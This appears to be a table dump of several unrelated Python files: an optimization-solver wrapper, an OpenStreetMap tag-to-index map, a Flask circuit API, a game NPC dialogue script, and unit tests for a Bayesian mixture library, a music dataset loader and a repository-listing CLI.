id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
22068
|
import attr
import types
from typing import Union
from enum import Enum
import numpy as np
from scipy.optimize import differential_evolution
import pygmo as pg
class OptimizationMethod(Enum):
"""
Available optimization solvers.
"""
SCIPY_DE = 1
PYGMO_DE1220 = 2
@attr.s(auto_attribs=True)
class ScipyDifferentialEvolutionSettings:
"""
Optional arguments to pass for SciPy's differential evolution caller.
Members
----------------
:ivar str strategy:
The differential evolution strategy to use. Should be one of: - 'best1bin' - 'best1exp' - 'rand1exp' -
'randtobest1exp' - 'currenttobest1exp' - 'best2exp' - 'rand2exp' - 'randtobest1bin' - 'currenttobest1bin' -
'best2bin' - 'rand2bin' - 'rand1bin' The default is 'best1bin'.
:ivar float recombination:
The recombination constant, should be in the range [0, 1]. In the literature this is also known as the crossover
probability, being denoted by CR. Increasing this value allows a larger number of mutants to progress into the
next generation, but at the risk of population stability.
:ivar float mutation:
The mutation constant. In the literature this is also known as differential weight, being denoted by F. If
specified as a float it should be in the range [0, 2].
:ivar float tol:
Relative tolerance for convergence, the solving stops when `np.std(pop) = atol + tol * np.abs(np.mean(population_energies))`,
where and `atol` and `tol` are the absolute and relative tolerance respectively.
:ivar int|numpy.random.RandomState seed:
If `seed` is not specified the `np.RandomState` singleton is used. If `seed` is an int, a new
`np.random.RandomState` instance is used, seeded with seed. If `seed` is already a `np.random.RandomState instance`,
then that `np.random.RandomState` instance is used. Specify `seed` for repeatable minimizations.
:ivar int workers:
If `workers` is an int the population is subdivided into `workers` sections and evaluated in parallel
(uses `multiprocessing.Pool`). Supply -1 to use all available CPU cores. Alternatively supply a map-like
callable, such as `multiprocessing.Pool.map` for evaluating the population in parallel. This evaluation is
carried out as `workers(func, iterable)`.
:ivar bool disp:
Display status messages during optimization iterations.
:ivar polish:
If True (default), then `scipy.optimize.minimize` with the `L-BFGS-B` method is used to polish the best
population member at the end, which can improve the minimization slightly.
"""
number_of_decision_variables: int
strategy: str = 'best1bin'
recombination: float = 0.3
mutation: float = 0.6
tol: float = 1e-5
seed: Union[np.random.RandomState, int] = np.random.RandomState()
workers: int = 1
disp: bool = False
polish: bool = True
popsize: int = None
population_size_for_each_variable: int = 15
total_population_size_limit: int = 100
def __attrs_post_init__(self):
if self.popsize is None:
self.popsize = self._estimate_population_size()
elif self.popsize <= 0:
raise ValueError('Number of individuals must be greater than 0.')
if type(self.popsize) != int:
raise TypeError('Population size must be an integer number.')
if not 0 < self.recombination <= 1:
raise ValueError('Recombination must be a value between 0 and 1.')
if type(self.mutation) == tuple:
mutation_dithering_array = np.array(self.mutation)
if len(self.mutation) > 2:
raise ValueError('Mutation can be a tuple with two numbers, not more.')
if mutation_dithering_array.min() < 0 or mutation_dithering_array.max() > 2:
raise ValueError('Mutation must be floats between 0 and 2.')
elif mutation_dithering_array.min() == mutation_dithering_array.max():
raise ValueError("Values for mutation dithering can't be equal.")
else:
if type(self.mutation) != int and type(self.mutation) != float:
raise TypeError('When mutation is provided as a single number, it must be a float or an int.')
if not 0 < self.mutation < 2:
raise ValueError('Mutation must be a number between 0 and 2.')
if self.tol < 0:
raise ValueError('Tolerance must be a positive float.')
def _estimate_population_size(self):
population_size = self.population_size_for_each_variable * self.number_of_decision_variables
if population_size > self.total_population_size_limit:
population_size = self.total_population_size_limit
return population_size
@attr.s(auto_attribs=True)
class PygmoSelfAdaptiveDESettings:
# TODO: docs and validations
gen: int
popsize: int
allowed_variants: list = [2, 6, 7]
variant_adptv: int = 2
ftol: float = 1e-6
xtol: float = 1e-6
memory: bool = True
seed: int = int(np.random.randint(0, 2000))
polish: bool = True
polish_method: str = 'tnewton_precond_restart'
parallel_execution: bool = False
number_of_islands: int = 2
archipelago_gen: int = 50
@attr.s(auto_attribs=True)
class PygmoOptimizationProblemWrapper:
# TODO: docs and validations
objective_function: types.FunctionType
bounds: list
args: list = []
def fitness(self, x):
return [self.objective_function(x, *self.args)]
def get_bounds(self):
return self._transform_bounds_to_pygmo_standard
def gradient(self, x):
return pg.estimate_gradient_h(lambda x: self.fitness(x), x)
@property
def _transform_bounds_to_pygmo_standard(self):
bounds_numpy = np.array(self.bounds, dtype=np.float64)
lower_bounds = list(bounds_numpy[:, 0])
upper_bounds = list(bounds_numpy[:, 1])
return lower_bounds, upper_bounds
@attr.s(auto_attribs=True)
class PygmoSolutionWrapperSerial:
# TODO: docs and validations
solution: pg.core.population
@property
def fun(self):
return self.solution.champion_f
@property
def x(self):
return self.solution.champion_x
@attr.s(auto_attribs=True)
class PygmoSolutionWrapperParallel:
# TODO: docs and validations
champion_x: np.ndarray
champion_f: Union[float, np.float64, np.ndarray]
@property
def fun(self):
return self.champion_f
@property
def x(self):
return self.champion_x
@attr.s(auto_attribs=True)
class OptimizationProblem:
"""
This class stores and solve optimization problems with the available solvers.
"""
# TODO: docs and validations
objective_function: types.FunctionType
bounds: list
optimization_method: OptimizationMethod
solver_args: Union[ScipyDifferentialEvolutionSettings, PygmoSelfAdaptiveDESettings]
args: list = []
def __attrs_post_init__(self):
if self.optimization_method == OptimizationMethod.SCIPY_DE and self.solver_args is None:
self.solver_args = ScipyDifferentialEvolutionSettings(self._number_of_decision_variables)
@property
def _number_of_decision_variables(self):
return len(self.bounds)
def solve_minimization(self):
if self.optimization_method == OptimizationMethod.SCIPY_DE:
result = differential_evolution(
self.objective_function,
bounds=self.bounds,
args=self.args,
strategy=self.solver_args.strategy,
popsize=self.solver_args.popsize,
recombination=self.solver_args.recombination,
mutation=self.solver_args.mutation,
tol=self.solver_args.tol,
disp=self.solver_args.disp,
polish=self.solver_args.polish,
seed=self.solver_args.seed,
workers=self.solver_args.workers
)
return result
elif self.optimization_method == OptimizationMethod.PYGMO_DE1220:
problem_wrapper = PygmoOptimizationProblemWrapper(
objective_function=self.objective_function,
bounds=self.bounds,
args=self.args
)
pygmo_algorithm = pg.algorithm(
pg.de1220(
gen=self.solver_args.gen,
allowed_variants=self.solver_args.allowed_variants,
variant_adptv=self.solver_args.variant_adptv,
ftol=self.solver_args.ftol,
xtol=self.solver_args.xtol,
memory=self.solver_args.memory,
seed=self.solver_args.seed
)
)
pygmo_problem = pg.problem(problem_wrapper)
if self.solver_args.parallel_execution:
solution_wrapper = self._run_pygmo_parallel(
pygmo_algorithm,
pygmo_problem,
number_of_islands=self.solver_args.number_of_islands,
archipelago_gen=self.solver_args.archipelago_gen
)
else:
pygmo_solution = self._run_pygmo_serial(pygmo_algorithm, pygmo_problem)
if self.solver_args.polish:
pygmo_solution = self._polish_pygmo_population(pygmo_solution)
solution_wrapper = PygmoSolutionWrapperSerial(pygmo_solution)
return solution_wrapper
else:
raise NotImplementedError('Unavailable optimization method.')
@staticmethod
def _select_best_pygmo_archipelago_solution(champions_x, champions_f):
best_index = np.argmin(champions_f)
return champions_x[best_index], champions_f[best_index]
def _run_pygmo_parallel(self, algorithm, problem, number_of_islands=2, archipelago_gen=50):
pygmo_archipelago = pg.archipelago(
n=number_of_islands,
algo=algorithm,
prob=problem,
pop_size=self.solver_args.popsize,
seed=self.solver_args.seed
)
pygmo_archipelago.evolve(n=archipelago_gen)
pygmo_archipelago.wait()
champions_x = pygmo_archipelago.get_champions_x()
champions_f = pygmo_archipelago.get_champions_f()
champion_x, champion_f = self._select_best_pygmo_archipelago_solution(champions_x, champions_f)
return PygmoSolutionWrapperParallel(champion_x=champion_x, champion_f=champion_f)
def _run_pygmo_serial(self, algorithm, problem):
population = pg.population(
prob=problem,
size=self.solver_args.popsize,
seed=self.solver_args.seed
)
solution = algorithm.evolve(population)
return solution
def _polish_pygmo_population(self, population):
pygmo_nlopt_wrapper = pg.nlopt(self.solver_args.polish_method)
nlopt_algorithm = pg.algorithm(pygmo_nlopt_wrapper)
solution_wrapper = nlopt_algorithm.evolve(population)
return solution_wrapper
|
22086
|
vals = {
"yes" : 0,
"residential" : 1,
"service" : 2,
"unclassified" : 3,
"stream" : 4,
"track" : 5,
"water" : 6,
"footway" : 7,
"tertiary" : 8,
"private" : 9,
"tree" : 10,
"path" : 11,
"forest" : 12,
"secondary" : 13,
"house" : 14,
"no" : 15,
"asphalt" : 16,
"wood" : 17,
"grass" : 18,
"paved" : 19,
"primary" : 20,
"unpaved" : 21,
"bus_stop" : 22,
"parking" : 23,
"parking_aisle" : 24,
"rail" : 25,
"driveway" : 26,
"8" : 27,
"administrative" : 28,
"locality" : 29,
"turning_circle" : 30,
"crossing" : 31,
"village" : 32,
"fence" : 33,
"grade2" : 34,
"coastline" : 35,
"grade3" : 36,
"farmland" : 37,
"hamlet" : 38,
"hut" : 39,
"meadow" : 40,
"wetland" : 41,
"cycleway" : 42,
"river" : 43,
"school" : 44,
"trunk" : 45,
"gravel" : 46,
"place_of_worship" : 47,
"farm" : 48,
"grade1" : 49,
"traffic_signals" : 50,
"wall" : 51,
"garage" : 52,
"gate" : 53,
"motorway" : 54,
"living_street" : 55,
"pitch" : 56,
"grade4" : 57,
"industrial" : 58,
"road" : 59,
"ground" : 60,
"scrub" : 61,
"motorway_link" : 62,
"steps" : 63,
"ditch" : 64,
"swimming_pool" : 65,
"grade5" : 66,
"park" : 67,
"apartments" : 68,
"restaurant" : 69,
"designated" : 70,
"bench" : 71,
"survey_point" : 72,
"pedestrian" : 73,
"hedge" : 74,
"reservoir" : 75,
"riverbank" : 76,
"alley" : 77,
"farmyard" : 78,
"peak" : 79,
"level_crossing" : 80,
"roof" : 81,
"dirt" : 82,
"drain" : 83,
"garages" : 84,
"entrance" : 85,
"street_lamp" : 86,
"deciduous" : 87,
"fuel" : 88,
"trunk_link" : 89,
"information" : 90,
"playground" : 91,
"supermarket" : 92,
"primary_link" : 93,
"concrete" : 94,
"mixed" : 95,
"permissive" : 96,
"orchard" : 97,
"grave_yard" : 98,
"canal" : 99,
"garden" : 100,
"spur" : 101,
"paving_stones" : 102,
"rock" : 103,
"bollard" : 104,
"convenience" : 105,
"cemetery" : 106,
"post_box" : 107,
"commercial" : 108,
"pier" : 109,
"bank" : 110,
"hotel" : 111,
"cliff" : 112,
"retail" : 113,
"construction" : 114,
"-1" : 115,
"fast_food" : 116,
"coniferous" : 117,
"cafe" : 118,
"6" : 119,
"kindergarten" : 120,
"tower" : 121,
"hospital" : 122,
"yard" : 123,
"sand" : 124,
"public_building" : 125,
"cobblestone" : 126,
"destination" : 127,
"island" : 128,
"abandoned" : 129,
"vineyard" : 130,
"recycling" : 131,
"agricultural" : 132,
"isolated_dwelling" : 133,
"pharmacy" : 134,
"post_office" : 135,
"motorway_junction" : 136,
"pub" : 137,
"allotments" : 138,
"dam" : 139,
"secondary_link" : 140,
"lift_gate" : 141,
"siding" : 142,
"stop" : 143,
"main" : 144,
"farm_auxiliary" : 145,
"quarry" : 146,
"10" : 147,
"station" : 148,
"platform" : 149,
"taxiway" : 150,
"limited" : 151,
"sports_centre" : 152,
"cutline" : 153,
"detached" : 154,
"storage_tank" : 155,
"basin" : 156,
"bicycle_parking" : 157,
"telephone" : 158,
"terrace" : 159,
"town" : 160,
"suburb" : 161,
"bus" : 162,
"compacted" : 163,
"toilets" : 164,
"heath" : 165,
"works" : 166,
"tram" : 167,
"beach" : 168,
"culvert" : 169,
"fire_station" : 170,
"recreation_ground" : 171,
"bakery" : 172,
"police" : 173,
"atm" : 174,
"clothes" : 175,
"tertiary_link" : 176,
"waste_basket" : 177,
"attraction" : 178,
"viewpoint" : 179,
"bicycle" : 180,
"church" : 181,
"shelter" : 182,
"drinking_water" : 183,
"marsh" : 184,
"picnic_site" : 185,
"hairdresser" : 186,
"bridleway" : 187,
"retaining_wall" : 188,
"buffer_stop" : 189,
"nature_reserve" : 190,
"village_green" : 191,
"university" : 192,
"1" : 193,
"bar" : 194,
"townhall" : 195,
"mini_roundabout" : 196,
"camp_site" : 197,
"aerodrome" : 198,
"stile" : 199,
"9" : 200,
"car_repair" : 201,
"parking_space" : 202,
"library" : 203,
"pipeline" : 204,
"true" : 205,
"cycle_barrier" : 206,
"4" : 207,
"museum" : 208,
"spring" : 209,
"hunting_stand" : 210,
"disused" : 211,
"car" : 212,
"tram_stop" : 213,
"land" : 214,
"fountain" : 215,
"hiking" : 216,
"manufacture" : 217,
"vending_machine" : 218,
"kiosk" : 219,
"swamp" : 220,
"unknown" : 221,
"7" : 222,
"islet" : 223,
"shed" : 224,
"switch" : 225,
"rapids" : 226,
"office" : 227,
"bay" : 228,
"proposed" : 229,
"common" : 230,
"weir" : 231,
"grassland" : 232,
"customers" : 233,
"social_facility" : 234,
"hangar" : 235,
"doctors" : 236,
"stadium" : 237,
"give_way" : 238,
"greenhouse" : 239,
"guest_house" : 240,
"viaduct" : 241,
"doityourself" : 242,
"runway" : 243,
"bus_station" : 244,
"water_tower" : 245,
"golf_course" : 246,
"conservation" : 247,
"block" : 248,
"college" : 249,
"wastewater_plant" : 250,
"subway" : 251,
"halt" : 252,
"forestry" : 253,
"florist" : 254,
"butcher" : 255}
def getValues():
return vals
|
22112
|
from app.models import Circuit, CircuitSchema, Provider
from flask import make_response, jsonify
from app import db
def read_all():
"""
This function responds to a request for /circuits
with the complete lists of circuits
:return: sorted list of circuits
"""
circuits = Circuit.query.all()
schema = CircuitSchema(many=True)
return schema.dump(circuits).data
def read_one(circuit_id):
circuit = Circuit.query.filter(Circuit.id == circuit_id).one_or_none()
if not circuit:
text = f'circuit not found for id {circuit_id}'
return make_response(jsonify(error=404, message=text), 404)
schema = CircuitSchema()
data = schema.dump(circuit).data
return data
def create(circuit):
"""
creates a circuit! checks to see if the provider_cid is unique and
that the provider exists.
:return: circuit
"""
provider_cid = circuit.get('provider_cid')
provider_id = circuit.get('provider_id')
circuit_exists = Circuit.query.filter(
Circuit.provider_cid == provider_cid
).one_or_none()
provider_exists = Provider.query.filter(Provider.id == provider_id).one_or_none()
if circuit_exists:
text = f'Circuit {provider_cid} already exists'
return make_response(jsonify(error=409, message=text), 409)
if not provider_exists:
text = f'Provider {provider_id} does not exist.' 'Unable to create circuit'
return make_response(jsonify(error=403, message=text), 403)
schema = CircuitSchema()
new_circuit = schema.load(circuit, session=db.session).data
db.session.add(new_circuit)
db.session.commit()
data = schema.dump(new_circuit).data
return data, 201
def update(circuit_id, circuit):
"""
updates a circuit!
:return: circuit
"""
c = Circuit.query.filter_by(id=circuit_id).one_or_none()
if not c:
text = f'Can not update a circuit that does not exist!'
return make_response(jsonify(error=409, message=text), 404)
schema = CircuitSchema()
update = schema.load(circuit, session=db.session).data
db.session.merge(update)
db.session.commit()
data = schema.dump(c).data
return data, 201
|
22208
|
import unittest
import shutil
import tempfile
import numpy as np
# import pandas as pd
# import pymc3 as pm
# from pymc3 import summary
# from sklearn.mixture import BayesianGaussianMixture as skBayesianGaussianMixture
from sklearn.model_selection import train_test_split
from pmlearn.exceptions import NotFittedError
from pmlearn.mixture import DirichletProcessMixture
class DirichletProcessMixtureTestCase(unittest.TestCase):
def setUp(self):
self.num_truncate = 3
self.num_components = 3
self.num_pred = 1
self.num_training_samples = 100
self.pi = np.array([0.35, 0.4, 0.25])
self.means = np.array([0, 5, 10])
self.sigmas = np.array([0.5, 0.5, 1.0])
self.components = np.random.randint(0,
self.num_components,
self.num_training_samples)
X = np.random.normal(loc=self.means[self.components],
scale=self.sigmas[self.components])
X.shape = (self.num_training_samples, 1)
self.X_train, self.X_test = train_test_split(X, test_size=0.3)
self.test_DPMM = DirichletProcessMixture()
self.test_nuts_DPMM = DirichletProcessMixture()
self.test_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.test_dir)
# class DirichletProcessMixtureFitTestCase(DirichletProcessMixtureTestCase):
# def test_advi_fit_returns_correct_model(self):
# # This print statement ensures PyMC3 output won't overwrite the test name
# print('')
# self.test_DPMM.fit(self.X_train)
#
# self.assertEqual(self.num_pred, self.test_DPMM.num_pred)
# self.assertEqual(self.num_components, self.test_DPMM.num_components)
# self.assertEqual(self.num_truncate, self.test_DPMM.num_truncate)
#
# self.assertAlmostEqual(self.pi[0],
# self.test_DPMM.summary['mean']['pi__0'],
# 0)
# self.assertAlmostEqual(self.pi[1],
# self.test_DPMM.summary['mean']['pi__1'],
# 0)
# self.assertAlmostEqual(self.pi[2],
# self.test_DPMM.summary['mean']['pi__2'],
# 0)
#
# self.assertAlmostEqual(
# self.means[0],
# self.test_DPMM.summary['mean']['cluster_center_0__0'],
# 0)
# self.assertAlmostEqual(
# self.means[1],
# self.test_DPMM.summary['mean']['cluster_center_1__0'],
# 0)
# self.assertAlmostEqual(
# self.means[2],
# self.test_DPMM.summary['mean']['cluster_center_2__0'],
# 0)
#
# self.assertAlmostEqual(
# self.sigmas[0],
# self.test_DPMM.summary['mean']['cluster_variance_0__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[1],
# self.test_DPMM.summary['mean']['cluster_variance_1__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[2],
# self.test_DPMM.summary['mean']['cluster_variance_2__0'],
# 0)
#
# def test_nuts_fit_returns_correct_model(self):
# # This print statement ensures PyMC3 output won't overwrite the test name
# print('')
# self.test_nuts_DPMM.fit(self.X_train,
# inference_type='nuts',
# inference_args={'draws': 1000,
# 'chains': 2})
#
# self.assertEqual(self.num_pred, self.test_nuts_DPMM.num_pred)
# self.assertEqual(self.num_components, self.test_nuts_DPMM.num_components)
# self.assertEqual(self.num_components, self.test_nuts_DPMM.num_truncate)
#
# self.assertAlmostEqual(self.pi[0],
# self.test_nuts_DPMM.summary['mean']['pi__0'],
# 0)
# self.assertAlmostEqual(self.pi[1],
# self.test_nuts_DPMM.summary['mean']['pi__1'],
# 0)
# self.assertAlmostEqual(self.pi[2],
# self.test_nuts_DPMM.summary['mean']['pi__2'],
# 0)
#
# self.assertAlmostEqual(
# self.means[0],
# self.test_nuts_DPMM.summary['mean']['cluster_center_0__0'],
# 0)
# self.assertAlmostEqual(
# self.means[1],
# self.test_nuts_DPMM.summary['mean']['cluster_center_1__0'],
# 0)
# self.assertAlmostEqual(
# self.means[2],
# self.test_nuts_DPMM.summary['mean']['cluster_center_2__0'],
# 0)
#
# self.assertAlmostEqual(
# self.sigmas[0],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_0__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[1],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_1__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[2],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_2__0'],
# 0)
#
#
class DirichletProcessMixturePredictTestCase(DirichletProcessMixtureTestCase):
# def test_predict_returns_predictions(self):
# print('')
# self.test_DPMM.fit(self.X_train, self.y_train)
# preds = self.test_DPMM.predict(self.X_test)
# self.assertEqual(self.y_test.shape, preds.shape)
# def test_predict_returns_mean_predictions_and_std(self):
# print('')
# self.test_DPMM.fit(self.X_train, self.y_train)
# preds, stds = self.test_DPMM.predict(self.X_test, return_std=True)
# self.assertEqual(self.y_test.shape, preds.shape)
# self.assertEqual(self.y_test.shape, stds.shape)
def test_predict_raises_error_if_not_fit(self):
print('')
with self.assertRaises(NotFittedError) as no_fit_error:
test_DPMM = DirichletProcessMixture()
test_DPMM.predict(self.X_train)
expected = 'Run fit on the model before predict.'
self.assertEqual(str(no_fit_error.exception), expected)
# class DirichletProcessMixtureScoreTestCase(DirichletProcessMixtureTestCase):
# def test_score_matches_sklearn_performance(self):
# print('')
# skDPMM = skBayesianGaussianMixture(n_components=3)
# skDPMM.fit(self.X_train)
# skDPMM_score = skDPMM.score(self.X_test)
#
# self.test_DPMM.fit(self.X_train)
# test_DPMM_score = self.test_DPMM.score(self.X_test)
#
# self.assertAlmostEqual(skDPMM_score, test_DPMM_score, 0)
#
#
# class DirichletProcessMixtureSaveAndLoadTestCase(DirichletProcessMixtureTestCase):
# def test_save_and_load_work_correctly(self):
# print('')
# self.test_DPMM.fit(self.X_train)
# score1 = self.test_DPMM.score(self.X_test)
# self.test_DPMM.save(self.test_dir)
#
# DPMM2 = DirichletProcessMixture()
# DPMM2.load(self.test_dir)
#
# self.assertEqual(self.test_DPMM.inference_type, DPMM2.inference_type)
# self.assertEqual(self.test_DPMM.num_pred, DPMM2.num_pred)
# self.assertEqual(self.test_DPMM.num_training_samples,
# DPMM2.num_training_samples)
# self.assertEqual(self.test_DPMM.num_truncate, DPMM2.num_truncate)
#
# pd.testing.assert_frame_equal(summary(self.test_DPMM.trace),
# summary(DPMM2.trace))
#
# score2 = DPMM2.score(self.X_test)
# self.assertAlmostEqual(score1, score2, 0)
|
22229
|
sm.setSpeakerID(1013000)
sm.sendNext("Ugh. This isn't going to work. I need something else. No plants. No meat. What, you have no idea? But you're the master, and you're older than me, too. You must know what'd be good for me!")
sm.setPlayerAsSpeaker()
sm.sendSay("#bBut I don't. It's not like age has anything to do with this...")
sm.setSpeakerID(1013000)
if sm.sendAskAccept("Since you're older, you must be more experienced in the world, too. Makes sense that you'd know more than me. Oh, fine. I'll ask someone who's even older than you, master!"):
if not sm.hasQuest(parentID):
sm.startQuest(parentID)
sm.setPlayerAsSpeaker()
sm.sendSayOkay("#b#b(You already asked Dad once, but you don't have any better ideas. Time to ask him again!)")
else:
sm.sendNext("No use trying to find an answer to this on my own. I'd better look for #bsomeone older and wiser than master#k!")
sm.dispose()
|
22239
|
import numpy as np
from tests.test_utils import run_track_tests
from mirdata import annotations
from mirdata.datasets import tonas
TEST_DATA_HOME = "tests/resources/mir_datasets/tonas"
def test_track():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
expected_attributes = {
"singer": "<NAME>",
"style": "Debla",
"title": "<NAME>",
"tuning_frequency": 451.0654725341684,
"f0_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.f0.Corrected",
"notes_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.notes.Corrected",
"audio_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.wav",
"track_id": "01-D_AMairena",
}
expected_property_types = {
"f0": annotations.F0Data,
"f0_automatic": annotations.F0Data,
"f0_corrected": annotations.F0Data,
"notes": annotations.NoteData,
"audio": tuple,
"singer": str,
"style": str,
"title": str,
"tuning_frequency": float,
}
run_track_tests(track, expected_attributes, expected_property_types)
def test_to_jams():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
jam = track.to_jams()
# Validate cante100 jam schema
assert jam.validate()
# Validate melody
f0 = jam.search(namespace="pitch_contour")[0]["data"]
assert [note.time for note in f0] == [0.197, 0.209, 0.221, 0.232]
assert [note.duration for note in f0] == [0.0, 0.0, 0.0, 0.0]
assert [note.value for note in f0] == [
{"index": 0, "frequency": 0.0, "voiced": False},
{"index": 0, "frequency": 379.299, "voiced": True},
{"index": 0, "frequency": 379.299, "voiced": True},
{"index": 0, "frequency": 379.299, "voiced": True},
]
print([note.confidence for note in f0])
assert [note.confidence for note in f0] == [3.09e-06, 2.86e-06, 7.15e-06, 1.545e-05]
# Validate note transciption
notes = jam.search(namespace="note_hz")[0]["data"]
assert [note.time for note in notes] == [
0.216667,
0.65,
2.183333,
2.566667,
]
assert [note.duration for note in notes] == [
0.433333,
1.016667,
0.3833329999999999,
0.3333330000000001,
]
assert [note.value for note in notes] == [
388.8382625732775,
411.9597888711769,
388.8382625732775,
411.9597888711769,
]
assert [note.confidence for note in notes] == [None, None, None, None]
def test_load_melody():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
f0_path = track.f0_path
f0_data_corrected = tonas.load_f0(f0_path, True)
f0_data_automatic = tonas.load_f0(f0_path, False)
# check types
assert type(f0_data_corrected) == annotations.F0Data
assert type(f0_data_corrected.times) is np.ndarray
assert type(f0_data_corrected.frequencies) is np.ndarray
assert type(f0_data_corrected.voicing) is np.ndarray
assert type(f0_data_corrected._confidence) is np.ndarray
assert type(f0_data_automatic) == annotations.F0Data
assert type(f0_data_automatic.times) is np.ndarray
assert type(f0_data_automatic.frequencies) is np.ndarray
assert type(f0_data_corrected.voicing) is np.ndarray
assert type(f0_data_automatic._confidence) is np.ndarray
# check values
assert np.array_equal(
f0_data_corrected.times,
np.array([0.197, 0.209, 0.221, 0.232]),
)
assert np.array_equal(
f0_data_corrected.frequencies, np.array([0.000, 379.299, 379.299, 379.299])
)
assert np.array_equal(
f0_data_corrected.voicing,
np.array([0.0, 1.0, 1.0, 1.0]),
)
assert np.array_equal(
f0_data_corrected._confidence,
np.array([3.090e-06, 0.00000286, 0.00000715, 0.00001545]),
)
# check values
assert np.array_equal(
f0_data_automatic.times,
np.array([0.197, 0.209, 0.221, 0.232]),
)
assert np.array_equal(
f0_data_automatic.frequencies,
np.array(
[
0.000,
0.000,
143.918,
143.918,
]
),
)
assert np.array_equal(
f0_data_automatic.voicing,
np.array([0.0, 0.0, 1.0, 1.0]),
)
assert np.array_equal(
f0_data_automatic._confidence,
np.array([3.090e-06, 2.860e-06, 0.00000715, 0.00001545]),
)
def test_load_notes():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
notes_path = track.notes_path
notes_data = tonas.load_notes(notes_path)
tuning_frequency = tonas._load_tuning_frequency(notes_path)
# check types
assert type(notes_data) == annotations.NoteData
assert type(notes_data.intervals) is np.ndarray
assert type(notes_data.pitches) is np.ndarray
assert type(notes_data.confidence) is np.ndarray
assert type(tuning_frequency) is float
# check tuning frequency
assert tuning_frequency == 451.0654725341684
# check values
assert np.array_equal(
notes_data.intervals[:, 0], np.array([0.216667, 0.65, 2.183333, 2.566667])
)
assert np.array_equal(
notes_data.intervals[:, 1], np.array([0.65, 1.666667, 2.566666, 2.9])
)
assert np.array_equal(
notes_data.pitches,
np.array(
[388.8382625732775, 411.9597888711769, 388.8382625732775, 411.9597888711769]
),
)
assert np.array_equal(
notes_data.confidence,
np.array(
[
0.018007,
0.010794,
0.00698,
0.03265,
]
),
)
def test_load_audio():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
audio_path = track.audio_path
audio, sr = tonas.load_audio(audio_path)
assert sr == 44100
assert type(audio) is np.ndarray
def test_metadata():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
metadata = dataset._metadata
assert metadata[default_trackid] == {
"title": "En el barrio de Triana",
"style": "Debla",
"singer": "<NAME>",
}
|
22267
|
class Response(object):
"""
"""
def __init__(self, status_code, text):
self.content = text
self.cached = False
self.status_code = status_code
self.ok = self.status_code < 400
@property
def text(self):
return self.content
def __repr__(self):
return 'HTTP {} {}'.format(self.status_code, self.content)
|
22272
|
import json
class TestListRepo:
def test_invalid(self, host):
result = host.run('stack list repo test')
assert result.rc == 255
assert result.stderr.startswith('error - ')
def test_args(self, host, add_repo):
# Add a second repo so we can make sure it is skipped
add_repo('test2', 'test2url')
# Run list repo with just the test box
result = host.run('stack list repo test output-format=json')
assert result.rc == 0
# Make sure we got data only for the test box
repo_data = json.loads(result.stdout)
assert len(repo_data) == 1
assert repo_data[0]['name'] == 'test'
# now get all of them
# assert both repos are in the list data
result = host.run('stack list repo output-format=json')
repo_data = json.loads(result.stdout)
assert len(repo_data) == 2
assert {'test', 'test2'} == {repo['name'] for repo in repo_data}
# now get all of them, by explicitly asking for them
# assert both repos are in the list data
result = host.run('stack list repo test test2 output-format=json')
new_repo_data = json.loads(result.stdout)
assert len(new_repo_data) == 2
assert {'test', 'test2'} == {repo['name'] for repo in new_repo_data}
def test_removed_not_listed(self, host, add_repo, revert_etc):
# Run list repo with just the test box
result = host.run('stack list repo test output-format=json')
assert result.rc == 0
# Make sure we got data only for the test box
repo_data = json.loads(result.stdout)
assert len(repo_data) == 1
assert repo_data[0]['name'] == 'test'
result = host.run('stack remove repo test')
assert result.rc == 0
# Run list repo again
result = host.run('stack list repo test output-format=json')
assert result.rc == 255
assert result.stderr.startswith('error - ')
def test_expanded_columns(self, host, host_os, add_repo):
# Run list repo with just the test box
result = host.run('stack list repo test expanded=true output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
"name": "test",
"alias": "test",
"url": "test_url",
"autorefresh": False,
"assumeyes": False,
"type": "rpm-md",
"is_mirrorlist": False,
"gpgcheck": False,
"gpgkey": None,
"os": host_os,
"pallet name": None
}
]
def test_add_repo_with_pallet(self, host, host_os, add_repo, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks, revert_etc):
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
#result = host.run(f'stack add pallet /root/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
pallet_data = json.loads(result.stdout)
assert len(pallet_data) == 1
# get pallet id, as well as the -'d name in the correct order
from stack.commands import DatabaseConnection, get_mysql_connection, Command
from stack.argument_processors.pallet import PalletArgProcessor
from operator import attrgetter
p = PalletArgProcessor()
p.db = DatabaseConnection(get_mysql_connection())
minimal_pallet = p.get_pallets(args=['minimal'], params=pallet_data[0])[0]
pallet_name = '-'.join(attrgetter('name', 'version', 'rel', 'os', 'arch')(minimal_pallet))
# now attach the test repo to the pallet
result = host.run(f'stack set repo test pallet={minimal_pallet.id}')
assert result.rc == 0
# now verify it is attached to that pallet
result = host.run('stack list repo test expanded=true output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
"name": "test",
"alias": "test",
"url": "test_url",
"autorefresh": False,
"assumeyes": False,
"type": "rpm-md",
"is_mirrorlist": False,
"gpgcheck": False,
"gpgkey": None,
"os": host_os,
"pallet name": pallet_name
}
]
# now verify that removing that pallet removes the repo as well
